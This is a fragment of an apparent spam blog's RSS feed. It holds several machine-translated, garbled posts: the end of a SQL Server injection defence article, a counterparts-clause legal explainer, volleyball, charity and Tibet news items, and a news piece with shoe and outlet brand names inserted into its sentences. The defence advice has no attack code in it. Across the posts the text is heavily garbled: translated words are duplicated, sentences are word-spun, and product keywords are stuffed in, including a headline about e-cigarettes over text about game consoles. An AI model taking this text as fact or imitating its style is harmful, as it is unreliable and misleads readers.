<p> Code Listing 6: Using ADODB Command object to access stored procedures. <br /> such as a list of code gray code block, to access SQL Server stored procedure to change through to ADODB Command <br /> object, so hackers can not be used added to the set of SQL syntax to SQL Server to perform additional action. <br /> get rid of the default Web virtual path, do not use the default system drive where IIS installed after the \ Inetp \ the WWWRoot <br /> path, otherwise use the aforementioned file access methods, it is hands and feet in the directory easily. <br /> Do not @ show the error message to the front end. <br /> VBScript syntax On Error Resume Next, and error handling with If Err.Number0 Then <br /> own error redirected to the appropriate error handling page, so the system will be more stable , and hackers are not easy to the internal workings of the system error message to Discovery. <br /> can also modify the system drive where the \ WINNT \ Help \ iisHelp \ common \ 500-100.asp <br /> preset the page, the easiest way is to change it name sql / SQL_Injection_G2.htm # 3 &#8220;> 3. <br /> less than powerful extended stored procedure to delete <br /> monitor the implementation of the system. <br /> firewall closure of the TCP 1433 / P 1434 <br /> port (the port) External, connection sql/SQL_Injection_G2.htm # 4 &#8220;> 4. <br /> keep an eye out whether a new patch. <br /> above the recommended protection against SQL Injection <br /> way, but we should bear in mind in the heart of the world best security system that only you always be careful to see more and more to listen to startle the gentlemen whether the renovation of the way the system is abnormal situation can only continue to strengthen the system security measures in order to harm to a minimum. <br /> Links <br /> Note: </p>
<p> author observation, the general designer of the program and more like to use SQL Server The default account sa <br /> to access the data. Thus giving the hacker ever increasing demands of power. </p>
<p> listed in the @ extended stored procedure can be seen through the Enterprise Manager or Qry Analyzer, but can not find in SQL Server Books Online, <br /> to the relevant information. The </p>
<p> I do not recommend the start delete the 500-100.asp, due to the @ makes it difficult for program debugging. Recommended that the program developed, the 500-100.asp <br /> change the name. Write your own asp files added to the On Error Resume Next / If Err.Number 0 Then <br /> error handling should be in the programming necessary to pay attention to the program structure, convenient for debugging purposes, first to The single quotes On Error Resume Next <br /> syntax description. </p>
<p> report @ show today specializes in network spider on the Internet, you can directly access through the TCP 1433 / P 1434 port (port), but the sa <br /> account does not set a password for SQL Server, locate the server after using the aforementioned techniques to obtain control over the system. <br /> &#8212; reproduced <br /> www.hnsxx.com <br /> www.jieyitongbao.com <br /> www.bmtx. net <br /> www.rwdj.net <br /> www.tyfg.net <br /> www.wxej.net <br /> www. mrxf.net <br /> www.hlry.net <br />% D% A <br /> www.guguzhai.net <br />% D% A <br /> www.guguzhai.org <br /> http://blog.sina.com.cn/s/blog_8fc31cfe0100w4iq.html </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/549/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Counterparts terms</title>
		<link>http://www.tianshi-cn.net/archives/542</link>
		<comments>http://www.tianshi-cn.net/archives/542#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:41:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[counterparts]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> <p ALIGN="center"> Counterparts clause in]]></description>
			<content:encoded><![CDATA[<p> 
<p ALIGN="center"> Counterparts clause in the contract agreement <br /> class file will often encounter &#8220;Counterparts <br /> clause&#8221; to understand some of the definitions of these terms, the nature and role of writing manuscript and translation contract type is helpful. The following is a description &#8220;Counterparts <br /> terms&#8221; short, to borrow it. <br /> Counterparts clauses <br /> What is a counterparts clause? <br /> A counterparts <br /> clause is normally included in a written agreement where the <br /> parties to the contract intend they will execute separate copies of <br /> the agreement (for example, in transactions where there is no <br /> signing meeting). The absence of a counterparts clause will not <br /> necessarily invalidate an agreement that the parties execute by <br /> separate counterparts. However, it may help to prevent a party from <br /> claiming that an agreement is not binding because there is no copy <br /> of it that has been signed by all parties. <br / > A counterparts <br /> clause will usually read something like this: <br /> &#8220;This <br /> agreement may be executed in any number of counterparts, each of <br /> which when executed and delivered shall constitute an original of <br /> this agreement, but all the counterparts shall together constitute <br /> the same agreement. No counterpart shall be effective until each <br /> party has executed at least one counterpart. &#8220;<br /> In a recent <br /> Supreme Court case, a counterparts clause was held to be a &#8220;subject <br /> to contract&#8221; provision because it included wording specifying that <br /> the agreement would only take effect when all the parties had <br / > signed it. As a result, if your business commonly starts to carry <br /> out contracts on the basis of a draft unsigned agreement, you will <br /> now not necessarily want your counterparts clause to contain <br /> wording about when the agreement becomes effective.You should <br /> review the counterparts clause you use in your standard agreements <br /> to see if it contains any language about when the agreement takes <br /> effect, for example, &#8220;No counterpart shall be effective until each <br /> party has executed at least one counterpart &#8220;. If so, you may wish <br /> to amend your agreements. However, you should bear in mind that, in <br /> certain types of agreements, it can be advantageous to include this <br /> condition. <br /> What is a <br /> &#8220;subject to contract&#8221; provision? The phrase &#8220;subject to contract&#8221; is <br /> legal shorthand that means that the parties to the contract have <br /> not yet reached agreement and are still in the process of <br /> negotiation, or that the agreement the parties have reached is not <br /> to be binding until it is signed. A &#8220;subject to contract&#8221; provision <br /> will usually prevent a draft contract from being binding and <br /> enforceable until it is signed. However, it is not fail-safe. If an <br /> objective appraisal of the parties words and conduct shows that <br /> the parties did not intend (or have ceased to intend) signature to <br /> be a precondition to the agreement being legally binding, the <br /> subject to contract provision will be <br /> overridden. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/542/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Appreciation English NewsSports articlespage 1China Men Struggle to Emulate Female Counterparts</title>
		<link>http://www.tianshi-cn.net/archives/541</link>
		<comments>http://www.tianshi-cn.net/archives/541#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:41:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[counterparts]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> <p STYLE="mso-line-height-alt:13.5pt;backg]]></description>
			<content:encoded><![CDATA[<p> 
<p STYLE="mso-line-height-alt:13.5pt;background:white"> <b> China Men Struggle to Emulate Female <br /> Counterparts </ B> <br / > <br /> 
<p STYLE="line-height:13.5pt;background:white"> China women volleyball team defied <br /> expectations to qualify for the London Olympics by claiming a top <br /> three spot at this month World Cup in Japan. <br /> 
<p ALIGN = "left" STYLE = "mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; text-align: left; line-height: 13.5pt; mso-pagination: widow-orphan; background: white "> The women side shocked many in the Volleyball <br /> <b STYLE =" mso-bidi-font-weight: normal "> fraternity </ B> <b STYLE="mso-bidi-font-weight:normal"> fellow staff </ B> <br /> with a series of commanding <br /> performances in claiming the <b STYLE="mso-bidi-font-weight:normal"> bronze </ B> <b STYLE="mso-bidi-font-weight:normal"> bronze </ B> <br /> at the Quadrennial competition . <br /> 
<p ALIGN = "left" STYLE = "mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; text-align: left; line-height: 13.5 pt; mso-pagination: widow-orphan; background: white "> CRI Jonathon Alpart spoke to China Volleyball <br /> Association vice-secretary Lv Yajun to evaluate China men chances of emulating their <br /> female counterparts . <br /> 
<p STYLE="line-height:13.5pt;background:white"> 
<p STYLE = "line-height: 13.5pt; background: white" > Twelve teams will take <br /> part in the men and women volleyball events at the London <br /> Olympics next year. With hosts Great Britain claiming one of those <br /> spots, that leaves 11 coveted spaces up for grabs . <br /> 
<p STYLE="line-height:13.5pt;background:white"> <b STYLE="mso-bidi-font-weight: normal"> The road </ B> <b STYLE = "mso-bidi-font-weight: normal"> travel </ B> <br /> to qualify for London can be an <b STYLE="mso-bidi-font-weight:normal"> arduous </ B > <b STYLE="mso-bidi-font-weight: normal"> hard </ B> one, but the earliest chance national teams have <br /> to claim their spot is at the FIVB World Cup held from November to < br /> December in Japan. <br /> 
<p STYLE="line-height:13.5pt;background:white"> China women qualified for the World Cup after <br /> winning the Asian Championship earlier in the year, and then <br /> performed well beyond expectations in finishing third at the World <br /> Cup to <b STYLE="mso-bidi-font-weight:normal"> book their <br /> place </ B> <b STYLE="mso-bidi-font-weight:normal"> set to the position </ B> in London. <br /> 
<p STYLE = "line-height: 13.5pt; background: white "> Wins over Japan, Serbia and Germany &#8211; each top ten <br /> teams, were the <b STYLE="mso-bidi-font-weight: normal"> highlights </ B> <b STYLE =" mso -bidi-font-weight: normal "> Highlights </ B> and see the Chinese team travel to the Olympics <br /> next year confident that they can <b STYLE="mso-bidi-font-weight:normal"> emulate </ B> <b STYLE="mso-bidi-font-weight: normal"> follow </ B> <br /> the glorious China teams of <br /> 1984 and 2004 to take Olympic gold . <br /> 
<p STYLE="line-height:13.5pt;background:white"> &#8220;It was an inspiration for China to claim a place <br /> at the Olympics. We will prepare a strategy for the Olympics. There <br /> are still about seven or eight months until the Olympics, and I <br /> believe that we can be even better by the time they <b STYLE = "mso-bidi-font-weight: normal "> come around </ B> <b STYLE="mso-bidi-font-weight: normal"> visit </ B> <b STYLE="mso-bidi-font-weight: normal">.&#8221; </ B> <br /> 
<p STYLE="line-height:13.5pt;background:white"> However, China men prospects are a little <br /> different, and Lv is less confident about their chances in <br /> London. <br /> 
<p STYLE="line-height:13.5pt;background:white"> Currently 10th in <b STYLE="mso-bidi-font-weight:normal"> the world <br /> rankings </ B> <b STYLE="mso-bidi-font-weight:normal"> world ranking </ B>, China men <b STYLE = "mso-bidi-font-weight: normal "> qualified for </ B> <b STYLE="mso-bidi-font-weight:normal"> finalists </ B> the World Cup as runners-up at the Asian <br /> Championships, and after losing their opening three matches in <br /> Japan, their hopes of qualifying through the World Cup are <br /> <b STYLE="mso-bidi-font-weight:normal"> hanging by a <br /> thread </ B> <b STYLE="mso-bidi-font-weight:normal"> at risk </ B>. <br /> 
<p STYLE="line-height:13.5pt;background:white"> &#8220;It will be hard for China men team to take <br /> one of the first three tickets to the Olympics since only the top <br /> three at the World Cup get the places. We will have chances against <br /> the lesser teams , but the difference between China and European and <br /> American teams is still huge. &#8220;<br /> 
<p STYLE="line-height:13.5pt;background:white"> It seems China men hopes will <b STYLE="mso-bidi-font-weight:normal"> lay in </ B> <b STYLE="mso-bidi-font-weight:normal"> is </ B> performing well at the Asian Qualification <br /> <b STYLE="mso-bidi-font-weight:normal"> Tournament </ B> <b STYLE="mso-bidi-font-weight:normal"> Championship </ B> next June where two places will be up for <br /> grabs. <br /> 
<p STYLE="line-height:13.5pt;background:white"> &#8220;Yes, there is still a chance to <b STYLE =" mso-bidi-font-weight: normal "> qualify </ B> <b STYLE="mso-bidi-font-weight:normal"> finalists </ B>. We played well this year and were <b STYLE =" mso-bidi-font-weight: normal "> runners-up </ B> <b STYLE="mso-bidi-font-weight:normal"> runner-up </ B> <br /> at the Asian Championships. We will still have a <br /> chance to qualify at the Asian Qualifying Tournament. &#8220;<br /> 
<p STYLE="line-height:13.5pt;background:white"> Lv believes that China best hopes of a <br /> volleyball medal lay with <br /> rely on &#8230; get <br /> its women team, who stand a good chance of <br /> getting on the <b STYLE = "mso-bidi-font-weight: normal "> podium dance </ B> <b STYLE="mso-bidi-font-weight:normal"> Taiwan </ B> in London. <br /> 
<p STYLE =" line-height: 13.5 pt; background: white "> While the men side <b STYLE="mso-bidi-font-weight:normal"> possess </ B> <b STYLE="mso-bidi-font-weight:normal"> have < / B> some talented young players, he believes they will <br /> <b STYLE="mso-bidi-font-weight: normal"> struggle to make the <br /> top-eight </ B> <b STYLE = "mso-bidi-font-weight: normal"> into the top eight </ B> <br /> in London &#8211; should they qualify, and that perhaps <br /> the best they could hope for, would be to register wins against <br /> some of the smaller teams next year. <br /> <b> <br /> <b> Note: This content is for communication, all copyright the author, please indicate the source </ B> </ B> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/541/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Private foundations outnumber the number of over; public counterparts more than &#8230;</title>
		<link>http://www.tianshi-cn.net/archives/540</link>
		<comments>http://www.tianshi-cn.net/archives/540#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:41:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[counterparts]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> <p STYLE="TexT-inDenT: 2em"> Updated: 201]]></description>
			<content:encoded><![CDATA[<p> 
<p STYLE="TexT-inDenT: 2em"> Updated: 2011-11-25 07:12 By He Dan <br /> (China Daily) <br /> BEIJING &#8211; For the first year ever, more private foundations are <br /> operating in China than public ones. <br /> 
<p STYLE="TexT-inDenT: 2em"> At the same time, those private <br /> foundations are finding that they lack the trained professionals <br /> and managers they need to function well, according to a recent <br /> research report. <br /> 
<p STYLE="TexT-inDenT: 2em"> At the Third China Private Foundation <br /> Forum on Thursday in Beijing, Beijing Normal University school of <br /> social development and public policy released a report on the <br /> development of private foundations. <br /> 
<p STYLE="TexT-inDenT: 2em"> [China Foundation Center Foundation China Center], a <br /> non-governmental philanthropic fraternity; kind of information provider, said <br /> 1,324 private foundations are now operating in China, 131 more than <br /> the number of public foundations that are in existence. <br /> 
<p STYLE="TexT-inDenT: 2em"> Figures from the Ministry of Civil <br / > Affairs, meanwhile, show the number of private foundations <br /> increased from 253 in 2005 to 1,065 in 2010. During the same <br /> period, public foundations went from being 721 in number to being <br /> 1,078. <br /> 
<p STYLE="TexT-inDenT: 2em"> In 2010, private foundations revenue <br /> increased to more than 10 billion yuan ($ 1.6 billion). That came <br /> mainly from donations, investments and government departments <br /> grant funding; [law] granted things s. <br /> 
<p STYLE="TexT-inDenT: 2em"> The report also said public foundations <br /> are better at raising money than private ones. They brought in more <br /> than 27 billion yuan this past year. <br /> 
<p STYLE="TexT-inDenT: 2em"> China began placing charity foundations <br /> into two categories in 2004 after issuing its Regulations on <br /> Foundation Management. <br /> 
<p STYLE="TexT-inDenT: 2em"> In China, an individual, a corporation <br /> or an academic institution can set up a private foundation using a <br /> fund containing a minimum of 2 million yuan. Such foundations are <br /> forbidden from raising money from the public. <br /> < br />
<p STYLE="TexT-inDenT: 2em"> Private foundations have taken on <br /> larger roles in ensuring that money and supplies go to providing <br /> relief from disasters, alleviating poverty and protecting the <br /> environment, said Sun Weilin, a senior official in charge of the <br /> management of non-governmental organizations under the Ministry of <br /> Civil Affairs. <br /> 
<p STYLE = "TexT -inDenT: 2em "> The government will continue to <br /> simplify the procedures a foundation must go through to be <br /> officially registered and introduce favorable tax policies and <br /> other incentives to make it easier for the organizations to expand. <br /> Private foundations still have difficulty meeting the public <br /> increasing and diverse demands, Sun added. <br /> 
<p STYLE="TexT-inDenT: 2em"> The report said private foundations <br /> have fewer than three full-time employees on average and that their <br /> scarcity is inadequate; lack of qualified workers has impeded impeded; prejudice; prevent their <br /> development. <br /> 
<p STYLE="TexT-inDenT: 2em"> &#8220;We e recognized that a majority of <br /> private foundations rely heavily on volunteers and part-time <br /> workers, a situation that has placed a lot of obstacles before <br /> their ability to perform their daily tasks, &#8220;said Tao Chuanjin, a <br /> Beijing Normal University professor and one of the two authors of <br /> the report. <br /> <br / >
<p STYLE="TexT-inDenT: 2em"> Tao said the low pay found at private <br /> foundations has proved a large obstacle to their attempts to <br /> attract more professionals. <br /> <br / >
<p STYLE="TexT-inDenT: 2em"> Regulations stipulate that charity <br /> foundations dministrative costs and their employees payments <br /> should not exceed 10 percent of their total expenses in a fiscal <br /> year. <br /> 
<p STYLE="TexT-inDenT: 2em"> The report said most private <br /> foundations follow that principle strictly, sometimes over-rigidly, <br /> keeping those costs within 3 percent of their annual expenses. <br /> 
<p STYLE="TexT-inDenT: 2em"> In 2010, Horizon Research Consultancy <br /> Group published a survey that polled about 450 charities. It showed < br /> that 80 percent of the former employees of those organizations quit <br /> their jobs because they were receiving what they considered to be <br /> low salaries. <br /> 
<p STYLE = "TexT -inDenT: 2em ">&#8221; Some foundations worry that high <br /> administrative costs will destroy their credibility, &#8220;Tao said. <br /> 
<p STYLE="TexT-inDenT: 2em">&#8221; But unreasonably low expenditures on <br /> management and on employees ruin their enthusiasm and willingness <br /> to stay in the field for a long time. &#8220;<br /> 
<p STYLE =" TexT-inDenT: 2em " ></p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/540/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>moncler outlet torino Always do their counterparts in Tibet</title>
		<link>http://www.tianshi-cn.net/archives/539</link>
		<comments>http://www.tianshi-cn.net/archives/539#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:41:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[counterparts]]></category>

		<guid isPermaLink="false">http://www.tianshi-cn.net/archives/539</guid>
		<description><![CDATA[<br /> <table> <br /> <tr> <br /> <td> <br /> <pre]]></description>
			<content:encoded><![CDATA[<p> Always do their counterparts in Tibet </p>
<p> WASHINGTON<br />
 Yin Cui by the Shanghai Municipal Committee, Municipal Committee, vice mayor Yang Xiong led the delegation arrived in Lhasa, Shanghai, and Tibet Autonomous Region Party Secretary Zhang, autonomous regions and deputy party secretary, District Vice President Hao Peng held talks with the leadership of the Tibet Autonomous Region . In his speech, Zhang of Shanghai people for their selfless assistance to the Tibetan people deep friendship and gratitude. Yin Cui said that Shanghai should stand on the party and the country overall strategic level, earnestly implement the central fifth Tibet Work Forum, (the switch version 3) (on the 1st edition) discussion of national economic counterpart to support Tibet principles and policies and will be on July 20, Xi Jinping hosted the Forum on Work in Tibet counterpart support proposed aid work<br />
 Yin Cui said at the forum, the Shanghai municipal government attaches great importance to study the Tibetan delegation to visit Shanghai. Shanghai, the delegation visit to Tibet, the first to congratulate the 60th anniversary of peaceful liberation of Tibet, experience the economic and social development of Tibet great achievements; the second is the sixth group of cadres Shanghai sympathy; three comrades with Tibet to explore how to implement good the central principles and policies on Tibet, to further promote Shanghai support work.<br />
 Yin Cui said the Shanghai counterparts in aid work in the local party and government leadership, the Tibet plans into local planning, canada goose outlet, everything from reality, to update the concept, improve the mechanism, innovative ways, expand the field, so that economic assistance and social support combined hardware and software supporting the construction of combined training of cadres and the combination of Tibet, the recent combination of aid and long-term support, focus on enhancing self-development and promotion of Xigaze counterpart support comprehensive benefits, efforts to improve the relevance and effectiveness of aid work, aid work to ensure the integrity, continuity, stability, and pioneering.<br />
 Zhang said, Shanghai has always been the strong backing of Tibet, Tibet counterparts to carry out the work, the Shanghai municipal government standing in the party and state work and great national unity height, stress politics and the overall, talk about dedication, and always the cause of Xigaze people as their own career to care, make every effort to support work, to ensure economic and social Xigaze by leaps and bounds, to ensure national security and long-term stability in Tibet, the Tibetan people living standards to ensure made a significant contribution to the continuous improvement. Shanghai has become the Tibet earlier, investment in large projects of many types, moncler outlet torino, covering a wide range of performance of the most prominent group of cadres of the provinces to become one of the typical support work. Tibetan people psyche Thanks for the great party, thanks to the great motherland.<br />
 Hao Peng, briefed the meeting on Tibet economic and social development of Tibet and Shanghai work. Tibet Autonomous Region Party Committee, Secretary-General of the civil servant Tashi attended the discussion. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/539/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nike shoes at their counterparts research</title>
		<link>http://www.tianshi-cn.net/archives/538</link>
		<comments>http://www.tianshi-cn.net/archives/538#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:40:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[counterparts]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> He alleged <br /> violations happened more ]]></description>
			<content:encoded><![CDATA[<p> He alleged <br /> violations happened more than locations that India UGG Classic <br /> Cardy are linked towards the militant group charged with plotting <br /> the Mumbai attacks.India refused violations happened, and <br /> Pakistan leader, Asif Zardari, attempted to understate the <br /> incident. &#8220;It is really areally a technical incursion, it is notit <br /> isn an incursion as a result. It a pattern of two planes once <br /> they are flying at 40,000 ft up within the air, Nike Shox once they turn, <br /> they slightly enter Pakistani soil, &#8220;he statedmentionedpointed <br /> out.Tensions in between the 2 rivals happen to be high <br /> becausethinking about that the Mumbai attacks, and political <br /> figures have at occasionsoccasions pledged cooperation and voiced <br /> consternation at their counterparts research. <br /> He will be <br /> the might be the may be the Timberland Roll-Top Boots initialfirst <br /> US soldier to become taken cheap nike shox in <br /> Afghanistan and Taliban commanders have formerly threatened to kill <br /> him.The guy within the video describes his therapy in the hands in <br /> the Taliban as humane, althoughalthoughdespite the fact that <br /> pictures of criminals becoming mistreated in US custody of the <br /> children expensive over the screen. &#8220;I had been Nike Shox continuously <br /> treated like a human becoming with dignity. I no one deny me of <br /> my clothes and take photos of me naked, &#8220;he statedmentionedpointed <br /> out.&#8221; I no dogs woofing at me and biting me as my country has <br /> completedcompletedcarried out to Muslim criminals within the jails <br /> which i pointed out. &#8220;Taliban authorities initialfirst launched a <br /> relevant video of Bergdahl in This summer, shortly following <br /> Timberland Custom Boots he was taken, and introduced earlier this <br /> year that an additional 1 was coming. The recording concludes with <br /> Zabihullah Mujahid, a Taliban spokesperson, reviving the militants <br /> demands for any prisoner exchange.IntelCenter, a US-based <br /> terrorism monitoring group, states a preliminary analysis shows the <br /> recording seems to become authentic. <br /> I <br /> wishing that, the moment when the Indian government completes their <br /> analysis and shares the infoparticularsdata around, we l have <br /> further results in further uncoverlocateuncover if you will find <br /> you will discover you l find you will find any causes about this <br /> side in the border, we l do something against them, &#8220;added Mr. <br /> Zardari.Pm Brown pledged much more assets to assist within the <br /> analysis in to the Nike <br /> Shox Mumbai terrorist attacks, which includes new explosive <br /> device-checking technologies contributing to $ 9 UGG Bailey Button <br /> Triplet to bolster Pakistani democratic institutions and fight <br /> extremism. <br /> It <br /> writes by nike shox <br /> date 12.4.2011. <br /> Tags: <br /> Nike Shox, cheap nike shox, discount nike shox, nike shox shoes, <br /> Sources: <br /> http://www.myinstylesshoes.com; </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/538/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>E Vapor Cigarette</title>
		<link>http://www.tianshi-cn.net/archives/537</link>
		<comments>http://www.tianshi-cn.net/archives/537#comments</comments>
		<pubDate>Thu, 15 Dec 2011 01:16:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[cigarette]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> Who said cottage only copy, is going to be ]]></description>
			<content:encoded><![CDATA[<p> Who said cottage only copy, is going to be &#8220;integration.&#8221; This <br /> doesn , a Chinese vendor introduced combining <strong> Electric <br /> Cigarettes </ STRONG>, now the host might be discounted <br /> abroad. <br /> This arcade game box known as the host, <strong> E <br /> Liquid </ STRONG>. It mimics ugly the fuselage Microsoft xbox 360 <br / > elite joystick controller, although the handle really should be to <br /> imitate the Sony PS3. Although in aspect the look off integration <br /> inside the two, but in games it not at all works with Xbox360 and <br / > PS3 games. <br /> This arcade game box supports Game Boy, Neo Geo and PS1 games, <br /> PS2 games are often asked run. Naturally, the computer hardware to <br /> put together this remedy also operate arcade games. <br /> <strong> E <br /> Cigarette Liquid </ STRONG> from mainland China get a common <br /> portable media player marketing term. Music player with extensive <br /> playing these little MPEG-1 Audio Layer 3 devices of various music <br /> files, MP4 player with MPEG-4 Part 14 format and is not directly <br /> related. To the contrary, it should be referred to as the <br /> marketplace for Apple ipods &#8220;next generation&#8221; (3  1 = 4). There are <br /> even some companies started to issue MP4 players successor MP5 <br /> player. MP4 player continues to be the bulk of the current market, <br / > and manufacturers ready to create numerous MP5 player. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/537/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

